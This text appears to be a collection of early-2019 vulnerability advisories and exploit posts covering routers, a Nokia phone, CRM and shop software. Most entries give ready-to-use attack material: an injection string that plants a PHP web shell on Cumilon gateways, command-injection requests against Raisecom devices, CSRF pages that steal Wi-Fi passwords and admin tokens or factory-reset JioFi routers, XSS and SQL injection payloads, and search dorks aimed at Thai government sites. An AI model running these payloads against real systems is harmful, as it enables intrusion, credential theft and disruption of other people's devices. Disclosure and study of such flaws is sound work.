Cumilon ISG-* cloud gateway is the security product developed by Systrome for the distributed access network for the cloud-computing era. It integrates the L2-L7 security features of the next-generation firewall, is based on the user identification and application identification and provides the application-layer firewall, intrusion prevention, anti-virus, anti-APT, VPN, intelligent bandwidth management, multi-egress link load balancing, content filtering, URL filtering, and other security functions. It provides the cloud interface. The security cloud management platform based on the big data platform architecture can monitor the network topology and device status in real time, simplifying the online deployment of the professional device via the auto configuration delivery. The real-time monitoring of the mobile terminal reduces the maintenance cost and makes the security visible at any time and anywhere. Systrome cloud gateway is the best access security choice of the middle and small enterprises, branch interconnection, and chain enterprises.

Description:
============
An issue was discovered on Systrome Cumilon ISG-600C, ISG-600H, and ISG-800W devices with firmware V1.1-R2.1_TRUNK-20181105.bin.
A shell command injection occurs by editing the description of an ISP file. The file network/isp/isp_update_edit.php does not properly validate user input, which leads to shell command injection via the des parameter.

[Additional_information]

The PHP file ./network/isp/isp_update_edit.php does not properly validate the user input, which leads to shell command injection.
Below is the vulnerable code snippet: "<td><input name="des" id="des" value="<?php echo $item['des'];?>" type="text"<?php echo $item['des'];?> size="50" maxlength="<?php echo XML_MAX_DESC_LEN;?>"/><"

[VulnerabilityType Other]
Authenticated Shell Command Injection


[Affected Component]
The PHP file ./network/isp/isp_update_edit.php does not properly validate the user input, which leads to shell command injection.
Below is the vulnerable code snippet: "<td><input name="des" id="des" value="<?php echo $item['des'];?>" type="text"<?

[Attack Type]
Local


[Impact Code execution]
true


[Attack Vectors]

visit the url http://device_ip/network/isp/isp_update_edit.php?pv=ISP_INTL.dat
adding the strings below will add a php system command shell in the webroot of the device:
'`echo PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4KCg== | base64 -d > /usr/local/wwwroot/cmd.php`'

the php system shell can then be accessed via browser, e.g: http://device_ip/cmd.php?cmd=ifconfig


Mitigation
==========

This issue is fixed in ISG-V1.1-R2.1_TRUNK-20181229.bin

Disclosure:
===========
10-Dec-2018 Discovered the vulnerability
10-Dec-2018 Reported to vendor
04-Jan-2019 Received the fix from vendor
04-Jan-2019 Requested the CVE ID
04-Feb-2019 CVE ID assigned
08-Feb-2019 Advisory published

[Discoverer]
* Kaustubh Padwad,
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad





Raisecom Technology GPON-ONU HT803G-07 Command Injection


Raisecom Technology GPON-ONU HT803G-07 suffers from an authenticated command injection vulnerability in the fmgpon_loid parameter.


MD5 | a7b4b967b526835e031e08633772389a

=====================================
Authenticated Shell Command Injection
=====================================

.. contents:: Table Of Content

Overview
========

Title: Authenticated Shell Command Injection
Author: Kaustubh G. Padwad
CVE ID: CVE-2019-7384
Vendor: Raisecom Technology Co., Ltd
Product: GPON-ONU HT803G-07 (possibly other models that share the same codebase)

Potentially vulnerable

ISCOM HT803G-U
ISCOM HT803G-W
ISCOM HT803G-1GE
ISCOM HT803G


Tested Version: : ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
Severity: High--Critical

Advisory ID
============
KSA-Dev-005


About the Product:
==================

The Raisecom GPON optical network terminal (ONT) series provides a flexible mix of residential access services including high speed data, IPTV, voice and CATV services compliant with the ITU-T G.984 standard. In particular, the Raisecom ONUs are designed for Ethernet data services, voice over IP, IPTV, CATV, wireless router accessing and convenient USB2.0 home network storage connections for various application scenarios, such as residential triple-play service and business connections. The GPON ONT series offer flexible choices in terms of downlink types and numbers, such as, GE/FE auto-adapting Ethernet ports, POTS (FXS) interfaces, RF port and WiFi function compliant with IEEE 802.11b/g/n. All GPON FTTX ONUs offer advanced end-to-end management and monitoring functionality, and the GPON series can be managed under the Raisecom NView platform.


Description:
============

An authenticated shell command injection issue has been discovered in Raisecom ISCOM HT803G-U, HT803G-W, HT803G-1GE, and HT803G GPON products with the firmware version ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 or below. The value of the fmgpon_loid parameter is used in a system call inside the boa binary. Because there is no user input validation, this leads to authenticated code execution on the device.

Additional Information
======================

The value of the fmgpon_loid parameter is passed to a system call in the application code inside the boa binary. Since there is no user input validation, this leads to authenticated code execution on the device.


Vulnerability Class:
====================
Authenticated Shell Command Injection

Attack Type
===========
Local


Impact Code execution
=====================
true

Attack Vectors
==============
To exploit this vulnerability, one must visit a crafted page or send a properly crafted request to the device.



How to Reproduce: (POC):
========================

POST /boaform/admin/formgponConf HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/gpon.asp
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 162

fmgpon_loid=%7c%20ping%20-n%2013%20127%2e0%2e0%2e1%20%7c&fmgpon_loid_password=raisecom&fmgpon_ploam_password=1234567890&apply=Apply+Changes&submit-url=%2Fgpon.asp

Mitigation
==========

This issue is fixed in the latest firmware, as per the vendor.

Disclosure:
===========
28-NOV-2018 Discovered the vulnerability
28-NOV-2018 Reported to vendor
10-DEC-2018 Received confirmation from vendor regarding fix
04-JAN-2019 Requested the CVE-ID
04-FEB-2018 CVE assigned

credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad





Raisecom Technology GPON-ONU HT803G-07 Command Injection


Raisecom Technology GPON-ONU HT803G-07 suffers from an authenticated command injection vulnerability in the newpass and confpass parameters in /bin/WebMGR.


MD5 | 96852f7edee55b1d7fe41b06c5100e95

=====================================
Authenticated Shell Command Injection
=====================================


Overview
========

Title: Authenticated Shell Command Injection
Author: Kaustubh G. Padwad

Vendor: Raisecom Technology Co., Ltd
Product: GPON-ONU HT803G-07 (other models sharing the same codebase may also be affected)

Potentially vulnerable:

ISCOM HT803G-U
ISCOM HT803G-W
ISCOM HT803G-1GE
ISCOM HT803G


Tested Version: ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
Severity: High/Critical

Advisory ID
============
KSA-Dev-006


About the Product:
==================

The Raisecom GPON optical network terminal (ONT) series provides a flexible mix of residential access services including high speed data, IPTV, voice and CATV services compliant with the ITU-T G.984 standard. In particular, the Raisecom ONUs are designed for Ethernet data services, voice over IP, IPTV, CATV, wireless router accessing and convenient USB2.0 home network storage connections for various application scenarios, such as residential triple-play service and business connections. The GPON ONT series offer flexible choices in terms of downlink types and numbers, such as, GE/FE auto-adapting Ethernet ports, POTS (FXS) interfaces, RF port and WiFi function compliant with IEEE 802.11b/g/n. All GPON FTTX ONUs offer advanced end-to-end management and monitoring functionality, and the GPON series can be managed under the Raisecom NView platform.


Description:
============
An authenticated shell command injection issue has been discovered in Raisecom ISCOM HT803G-U, HT803G-W, HT803G-1GE, and HT803G GPON products with the firmware version ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 or below. The values of the newpass and confpass parameters in /bin/WebMGR are used in a system call in the firmware. Because there is no user input validation, this leads to authenticated code execution on the device.

Additional Information
======================

The values of the newpass and confpass parameters in /bin/WebMGR are passed to a system call in the firmware. Since there is no user input validation, this leads to authenticated code execution on the device.

Vulnerability Class:
====================
Authenticated Shell Command Injection


Attack Type
===========
Local


Impact Code execution
=====================
true


Attack Vectors
==============
To exploit this vulnerability, one needs to send the correct request to the device or visit a crafted page.


How to Reproduce: (POC):
========================

curl -i -s -k -X 'POST' \
-H 'Origin: http://192.168.1.1' -H 'Upgrade-Insecure-Requests: 1' -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36' -H 'Referer: http://192.168.1.1/password.asp' \
--data-binary $'userMode=0&oldpass=netstat&newpass=`reboot`&confpass=`reboot`&submit-url=%2Fpassword.asp&save=Apply+Changes&csrf_token=current_cCSRF_ToKEN' \
'http://192.168.1.1/boaform/formPasswordSetup'

Mitigation
==========

This issue is fixed in the latest firmware, as per the vendor.

Disclosure:
===========
28-NOV-2018 Discovered the vulnerability
28-NOV-2018 Reported to vendor
10-DEC-2018 Received confirmation from vendor regarding fix
05-JAN-2019 Request for the CVE-ID
04-FEB-2019 CVE Assigned

credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad




Nokia 8810 Denial Of Service


A denial of service issue has been discovered in the Gecko component of KaiOS 2.5 10.05 (platform 48.0.a2) on Nokia 8810 4G devices. When a crafted web page is visited with the internal browser, the Gecko process crashes with a segfault. Successful exploitation could lead to the remote code execution on the device.


MD5 | 3634f2043d52856b3dc8fee6e53be5da

=====================================================
DoS and gecko reboot in the nokia 8810 4G handset
=====================================================


Overview
========

Title: DoS and Gecko reboot in the Nokia 8810 4G handset
Author: Kaustubh G. Padwad
CVE ID: CVE-2019-7386
Vendor: HMD Global, Nokia, KaiOS
Products: Nokia 8810 4G

Tested Version:
Model: Nokia 8810 4G
Software: 10.05
KaiOS Version: 2.5
Build Number: 10.05
Platform version: 48.0.a2
Severity: High/Critical

Advisory ID
============
KSA-Dev-007


About the Product:
==================
Brand: Nokia
Developer: HMD Global
Manufacturer: Foxconn
Operating System: KaiOS
Nokia 8110 4G is a Nokia-branded mobile phone developed by HMD Global. It was announced on 25 February 2018 at Mobile World Congress (MWC) 2018 in Barcelona, Spain, as a revival of the original Nokia 8110, which was popularly known as the "Matrix phone" or "banana phone". It runs on an operating system based on KaiOS, and through the company's partnership with Google also features Google services like Maps and Assistant.

Description:
============

A Denial of Service issue has been discovered in the Gecko component of KaiOS 2.5 10.05 (platform 48.0.a2) on Nokia 8810 4G devices. When a crafted web page is visited with the internal browser, the Gecko process crashes with a segfault. Successful exploitation could lead to remote code execution on the device.

Affected Product Code Base
==========================
Nokia 8810 4G - Software: 10.05, KaiOS Version: 2.5, Build Number: 10.05, Platform version: 48.0.a2


Vulnerability Class:
====================
Buffer Overflow

Attack Type
===========
Remote


Impact Denial of Service
========================
true


Attack Vectors
==============
To exploit this vulnerability, one needs to visit a crafted web page using the device's built-in browser.

Affected Component
==================
The Denial of Service issue has been discovered in the Gecko component of the KaiOS used in the Nokia 8810 4G. When a crafted web page is visited with the internal browser of the Nokia, the Gecko process crashes with a segfault.


How to Reproduce: (POC):
========================
1. Host a web page with the content below on a controlled server (e.g. 192.168.1.1) as crash.html.

<!DOCTYPE html>
<html>
<body>
  <canvas id="canvas" width="500" height="500"> </canvas>
  <script>
    var canvas = document.getElementById("canvas");
    var width = canvas.width;
    var height = canvas.height;
    // Repeatedly stroke vertical lines across the canvas; the accumulated
    // path triggers the crash in the renderer described above.
    for (var x = 0; x < 400; x++) {
      var ctx = canvas.getContext("2d");
      for (var i = 0; i < width; i += 10) {
        ctx.moveTo(i, 0);
        ctx.lineTo(i, height);
        ctx.stroke();
      }
    }
  </script>
</body>
</html>


2. Now visit the URL http://192.168.1.1/crash.html using the built-in browser.

3. As soon as the page renders, it causes a buffer overflow in the SkiaGL component of Gecko and causes Gecko to reboot.

Mitigation
==========

Not Available

Disclosure:
===========
01-JAN-2019 Discovered the vulnerability
01-JAN-2018 Reported to Nokia
02-JAN-2019 Nokia asked to report to HMD Global
02-JAN-2019 Reported to HMD Global using info@hmdglobal.com (no response)
04-JAN-2019 Tweeted to them (no response)
05-JAN-2019 Requested the CVE-ID
04-FEB-2019 CVE assigned

credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad





CA Privileged Access Manager Information Disclosure / Modification


CA Technologies Support is alerting customers to a potential risk with CA Privileged Access Manager. A vulnerability exists that can allow a remote attacker to access sensitive information or modify configuration. CA published solutions to address the vulnerabilities. CVE-2019-7392 describes a vulnerability resulting from inadequate access controls for the components jk-manager and jk-status web service allowing a remote attacker to access the CA PAM Web-UI without authentication. Affected versions include 3.2.1 and below, 3.1.2 and below, and 3.0.x releases.


MD5 | 62e102837dc764a13b22e6ff9411499e


CA20190212-01: Security Notice for CA Privileged Access Manager

Issued: February 12, 2019
Last Updated: February 12, 2019

CA Technologies Support is alerting customers to a potential risk
with CA Privileged Access Manager. A vulnerability exists that can
allow a remote attacker to access sensitive information or modify
configuration. CA published solutions to address the vulnerabilities.

CVE-2019-7392 describes a vulnerability resulting from inadequate
access controls for the components jk-manager and jk-status web
service allowing a remote attacker to access the CA PAM Web-UI
without authentication.

Risk Rating

High

Platform(s)

All platforms

Affected Products

CA Privileged Access Manager 3.2.1 and prior releases
CA Privileged Access Manager 3.1.2 and prior releases
CA Privileged Access Manager 3.0.x

How to determine if the installation is affected

Customers may check the version of the product to determine if they
are running a vulnerable release.

Solution

CA Privileged Access Manager 3.2.1 and prior releases:
Update to CA Privileged Access Manager 3.2.2 or later

CA Privileged Access Manager 3.1.2 and prior releases:
Update to CA Privileged Access Manager 3.1.3 or later

CA Privileged Access Manager 3.0.x:
Contact CA support for guidance

References

CVE-2019-7392 - CA Privileged Access Manager jk-manager and jk-status access

Acknowledgement

CVE-2019-7392 - Bob Brust

Change History

Version 1.0: 2019-02-12 - Initial Release

CA customers may receive product alerts and advisories by subscribing
to Proactive Notifications.

Customers who require additional information about this notice may
contact CA Technologies Support at http://support.ca.com/.

To report a suspected vulnerability in a CA Technologies product,
please send a summary to CA Technologies Product Vulnerability
Response at vuln <AT> ca.com

Security Notices and PGP key
support.ca.com/irj/portal/anonymous/phpsbpldgpg
www.ca.com/us/support/ca-support-online/documents.aspx?id=177782

Kevin Kotas
Vulnerability Response Director
CA Technologies Product Vulnerability Response

Copyright 2019 Broadcom. All Rights Reserved. The term "Broadcom"
refers to Broadcom Inc. and/or its subsidiaries. Broadcom, the pulse
logo, Connecting everything, CA Technologies and the CA technologies
logo are among the trademarks of Broadcom. All trademarks, trade
names, service marks and logos referenced herein belong to their
respective companies.



Jiofi 4 (JMR 1140) Cross Site Scripting


Jiofi 4 (JMR 1140) with firmware version Amtel_JMR1140_R12.07 suffers from a cross site scripting vulnerability.


MD5 | 44327251f5c9f546049ea0bb8e177299

# Exploit Title: Jiofi 4 (JMR 1140) Reflected Cross Site Scripting
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact: https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7687


Description:
cgi-bin/qcmap_web_cgi on JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices has POST based reflected XSS via the Page parameter. No sanitization is performed for user input data.

1. Create poc.html and insert:

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="Page" value="GetDeviceDetailsyfc7b<script>alert(document.domain)</script>pyk0j" />
<input type="hidden" name="mask" value="0" />
<input type="hidden" name="token" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

2. Send it to the victim (who is connected to the Wi-Fi network).
3. The POST-based XSS fires.

The exploit works in Firefox Quantum, Firefox Developer Edition, etc. Chrome's XSS Auditor blocks this PoC.


Jiofi 4 (JMR 1140) WiFi Password Cross Site Request Forgery


Jiofi 4 (JMR 1140) with firmware version Amtel_JMR1140_R12.07 suffers from a WiFi password disclosure cross site request forgery vulnerability.


MD5 | 9324783dffb24179b9a0c8c09adb0446

# Exploit Title: Jiofi 4 (JMR 1140) CSRF To View Wi-fi Password
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact: https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7745

Description:

JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain the Wi-Fi password by making a cgi-bin/qcmap_web_cgi Page=GetWiFi_Setting request and then reading the wpa_security_key field.

PoC:
1. Create view.html and insert:

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="Page" value="GetWiFi_Setting" />
<input type="hidden" name="Mask" value="0" />
<input type="hidden" name="result" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


2. Send it to the victim (who is connected to the Wi-Fi network).
3. The response contains the current Wi-Fi password.
Example response:

{"Page":"GetWiFi_Setting","Mask":"0","result":"SUCCESS","ssid":"JioFi4_08FE5F","mode_802_11":"11bgn","tx_power":"MID",
"wmm":"Enable","wps_enable":"PushButton","wifi_security":"WPA2PSK","wpa_encryption_type":"AES",
"wpa_security_key":"leakedpassword",".....etc}


Note: I believe this works on all other Jio routers, viz. Jio JMR 540 and JioFi M2, as all share a similar web interface. I have not confirmed this.


Jiofi 4 (JMR 1140) Admin Token Disclosure Cross Site Request Forgery


Jiofi 4 (JMR 1140) with firmware version Amtel_JMR1140_R12.07 suffers from an admin token disclosure cross site request forgery vulnerability.


MD5 | 54b333f209877e03f40a9c1db03a00f1

# Exploit Title: Jiofi 4 (JMR 1140) CSRF To Leak Admin Tokens to change wifi Password or Factory Reset Router
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact: https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7746

Description:

JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain an admin token by making a /cgi-bin/qcmap_auth type=getuser request and then reading the token field. This token value can then be used to change the Wi-Fi password or perform a factory reset.

PoC:

The exploit requires two CSRF requests to be sent to the victim (logged in to the web interface) connected to the JioFi router.

1. First, get the admin tokens:

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_auth" method="POST">
<input type="hidden" name="type" value="getuser" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


Example response:

{"super_user_id":"administrator", "oper_user_id":"operator", "end_user_id":"admin", "token":"leakedtokens"}

Choice A) Change the Wi-Fi password of the JioFi 4 (JMR 1140) router to the attacker's choice.

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="Page" value="SetWiFi_Setting" />
<input type="hidden" name="Mask" value="0" />
<input type="hidden" name="result" value="0" />
<input type="hidden" name="ssid" value="JioFi4_08FE5F" />
<input type="hidden" name="mode_802_11" value="11bgn" />
<input type="hidden" name="tx_power" value="HIGH" />
<input type="hidden" name="wmm" value="Enable" />
<input type="hidden" name="wps_enable" value="PushButton" />
<input type="hidden" name="wifi_security" value="WPA2PSK" />
<input type="hidden" name="wpa_encryption_type" value="AES" />
<input type="hidden" name="wpa_security_key" value="Iamhacked" />
<input type="hidden" name="wep_security_key_1" value="0" />
<input type="hidden" name="wep_security_key_2" value="0" />
<input type="hidden" name="wep_security_key_3" value="0" />
<input type="hidden" name="wep_security_key_4" value="0" />
<input type="hidden" name="wep_current_default_key" value="0" />
<input type="hidden" name="channel_mode" value="automatic" />
<input type="hidden" name="channel_selection" value="11" />
<input type="hidden" name="sleep_mode" value="Enable" />
<input type="hidden" name="sleep_mode_timer" value="30" />
<input type="hidden" name="ssid_broadcast" value="Enable" />
<input type="hidden" name="enable_wifi" value="Enable" />
<input type="hidden" name="token" value="leakedtokens" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

The Wi-Fi password is changed to Iamhacked.

Choice B) Perform a remote factory reset.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="type" value="FRST_REAL" />
<input type="hidden" name="token" value="leakedtokens" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

The router reboots to default settings.


Note: I believe this works on all other Jio routers, viz. Jio JMR 540 and JioFi M2, as all share a similar web interface. I have not confirmed this.


Rukovoditel Project Management CRM 2.4.1 Cross Site Scripting


Rukovoditel Project Management CRM version 2.4.1 suffers from a cross site scripting vulnerability.


MD5 | 5e498fde17ff7f22be387b9e8c2abbd8

####################################################################

# Exploit Title : Rukovoditel Project Management CRM 2.4.1 - XSS Vulnerability (DOM BASED)
# Author [ Discovered By ] : Mehmet EMIROGLU
# Date : 29/01/2019
# Vendor Homepage : https://www.rukovoditel.net/
# Software Link : https://sourceforge.net/projects/rukovoditel/
# Affected Versions : 2.4.1
# Tested On : Wampp, Windows,Lampp
# Category : WebApps
# Exploit Risk : Medium
# CVE : CVE-2019-7541
# Software Description : Rukovoditel is a free web-based open-source project management application. A far cry from traditional applications, Rukovoditel gives users a broader and extensive approach to project management. Its customization options allow users to create additional entities, modify and specify the relationship between them, and generate the necessary reports.

####################################################################

# Impact :
*********

* The affected web application is Rukovoditel Project Management CRM version 2.4.1.
* First, delete the value string from the URL (...module=users%2flogin).
* Then add the XSS code given below to the end of the URL.
* Proof is in the picture below:
* https://i.hizliresim.com/6aydM7.jpg

####################################################################

# PoC :
****************************
* XSS Code : "><img src=x onerror=document.body.innerHTML=location.hash>#"><img src=x onerror=prompt(123456789)>
* Value : users%2flogin
* Get Request : http://localhost/[PATH]/index.php?module=users%2flogin
* URL : http://localhost/rukovoditel/index.php?module="><img src=x onerror=document.body.innerHTML=location.hash>#"><img src=x onerror=prompt(123456789)>

####################################################################

NetworkSleuth 3.0 Denial Of Service


NetworkSleuth version 3.0 suffers from a denial of service vulnerability.


MD5 | 00e290440f45d9332ab4d2b09df6f728

# -*- coding: utf-8 -*-
# Exploit Title: NetworkSleuth 3.0 - Denial of Service (PoC)
# Date: 12/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.nsauditor.com/
# Software Link: http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Version: 3.0.0.0
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "NetworkSleuth.py", it will create a new file "PoC.txt"
# 2.- Copy the text from the generated PoC.txt file to clipboard
# 3.- Open NetworkSleuth.exe
# 4.- Go to Register > Enter Registration Code...
# 5.- Paste clipboard in 'Name' field
# 6.- Write '1234' in 'Key' field
# 7.- Click on the Ok button
# 8.- The application crashes

buffer = "\x41" * 256
f = open ("PoC.txt", "w")
f.write(buffer)
f.close()

PilusCart 1.4.1 SQL Injection


PilusCart version 1.4.1 suffers from a remote SQL injection vulnerability.


MD5 | 36d802c950fc13c6e78806fd702b0f86

####################################################################

# Exploit Title: PilusCart 1.4.1 - 'send' SQL Vulnerability
# Dork: N/A
# Date: 10-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/pilus/
# Software Link: https://sourceforge.net/projects/pilus/
# Version: 1.4.1
# Category: Webapps
# Tested on: Wampp @Win
# CVE: N/A
# Software Description: PilusCart is a web-based online store management system, written in PHP scripting language as the most popular web programming language today. To store the data, PilusCart uses MySQL relational database management system.

####################################################################

# Vulnerabilities / Impact
# The affected web application is PiLuS version 1.4.1.
# Go to http://localhost/PiLUS/read-apa-itu-pdo and fill in the
# red-colored parts shown in the link https://i.hizliresim.com/MV11La.jpg
# Intercept the request with Burp Suite and add the attack pattern
# payload at the end of the request.

####################################################################

# POC - SQL (Boolean Based String)
# Parameters : send
# Attack Pattern : RLIKE (case when 7488715=7488715 then
0x656d69726f676c75 else 0x28 end)
# POST Request :
http://localhost/PiLUS/read-apa-itu-pdo?post_id=3&post_slug=apa-itu-pdo&nama_komentar=4866630&situs_web=9391510&captcha=4551404&token=473ec0c6bda264fefb8447c8ff01956248ea477c&isi_komentar=EMIROGLU2823174&send=Kirim RLIKE (case when 7488715=7488715 then 0x656d69726f676c75 else 0x28 end)





runc Container Breakout


This is exploit code for CVE-2019-5736 (and it works for both runc and LXC). The simplest way to use it is to copy the exploit code into an existing container, and run make.sh. However, you could just as easily create a bad image and run that. This affects runc versions prior to 1.0-rc6 (Docker versions less than 18.09.2).


MD5 | f758fe7491da2696ad9e36fc211624fb


BizPotential EasyWebTime 8.6.2 Bypass / SQL Injection


BizPotential EasyWebTime version 8.6.2 suffers from bypass and remote SQL injection vulnerabilities.


MD5 | 87b29ff8df964bfb44035033fedb86fb

#############################################################

# Exploit Title : BizPotential EasyWebTime 8.6.2 SQL Injection / Bypass
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/02/2019
# Vendor Homepage : bizpotential.com ~ ewtadmin.com
# Software Information Link : bizpotential.com/overview.php
# Software Affected Version : 8.6.2 and all previous versions.
# Software Price : 100$
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CWE-592 [ Authentication Bypass Issues ]
# CXSecurity Reference Link : cxsecurity.com/ascii/WLB-2018090088

#############################################################

BizPotential EasyWebTime 8.6.2 Thailand Government SQL Injection Vulnerability

#############################################################

# Google Dorks :
*****************

inurl:''/ewtadmin/'' site:go.th

inurl:''/main.php?filename='' site:go.th

inurl:''/ewtadmin/ewt/ccs/''

intext:''(c) Copyright 2007 - BizPotential.com - All Rights Reserved.''

intext:''Copyright 2007 - BizPotential Co., Ltd. - All Rights Reserved''

#############################################################

# Admin Control Panel Paths :
***************************

/ewtadmin/index.php
/ewtadmin82/
/ewtcommittee/index2331.php
/ewtadmin/ewt/DOMAINNAMEHERE_intranet/ewt_login.php

#############################################################

# SQL Injection Exploit :
***********************

/n_more3.php?page=[ID-NUMBER]&c_id=[SQL Injection]

/ewtadmin/ewt/[DOMAINNAME_web/n_more.php?c_id=[SQL Injection]

/more_news.php?offset=[SQL Injection]

/more_news.php?offset=-[ID-NUMBER]&cid=&startoffset=[SQL Injection]

#############################################################

# Webboard Exploit Bypass :
**************************

/ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1&filename=webboard

# Webboard Directory Path :
**************************

/ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard

/index_question.php?wcad=5&t=1&filename=webboard

ccs.DOMAINNAME.go.th/index_question.php?wcad=5&t=1&filename=webboard

#############################################################

# Example SQL Database Errors =>
********************************
SELECT * FROM article_list WHERE c_id = '199'' and n_approve = 'Y'
ORDER BY n_date DESC LIMIT -20,20
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '-20,20' at line 1

SELECT * FROM article_list WHERE ( c_id = '' ) AND n_approve =
'Y' AND (('2561-09-10 05:57:13' between n_date_start and n_date_end)
or (n_date_start = '' and n_date_end = '')) ORDER BY n_date
DESC,n_timestamp DESC LIMIT 60\\\',20
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '\\\',20' at line 1

#############################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#############################################################

F3-CMS FatFreeFramework 0.0.1 Database Disclosure


F3-CMS FatFreeFramework version 0.0.1 suffers from a database disclosure vulnerability.


MD5 | b2265f4022d82e13afdddcc9a0cb4938

####################################################################

# Exploit Title : F3-CMS FatFreeFramework 0.0.1 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/02/2019
# Vendor Homepage : f3cms.ca ~ fatfreeframework.com
# Software Download Link : github.com/vijinho/f3-cms/archive/dev-master.zip
# Software Information Link : github.com/vijinho/f3-cms
github.com/vijinho/f3-cms/blob/dev-master/docs/DATABASE.md
# Software Version : 0.0.1 and higher versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-16 [ Configuration ] ~ CWE-200 [ Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
F3 CMS is a Content Management System.

The F3 CMS framework is a secure and robust, PHP-based coding platform.

####################################################################

# Impact :
***********
The configuration files of F3-CMS FatFreeFramework 0.0.1 and higher versions may disclose sensitive information to remote attackers. These files are stored in the folder /data/db/sql/.

HTTP requests consisting of a single character will cause the software to disclose sensitive configuration information, including the password/database of the administrative web interface.

The files are installed, by default, with world-readable and possibly world-writeable permissions. This may have potentially serious consequences, as the configuration files also store password information in plain text.

This issue occurs because access controls on the configuration files are not properly set. An attacker can exploit this issue to retrieve potentially sensitive information by requesting the files via URL. This may aid in further attacks.

####################################################################

# Database Disclosure Exploit :
**************************
/data/db/sql/audit-archive.sql

/data/db/sql/create.sql

/data/db/sql/phinx.sql

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################

Invo PhalconPHP 1.x Database Configuration Disclosure


Invo PhalconPHP version 1.x suffers from a database configuration file disclosure vulnerability.


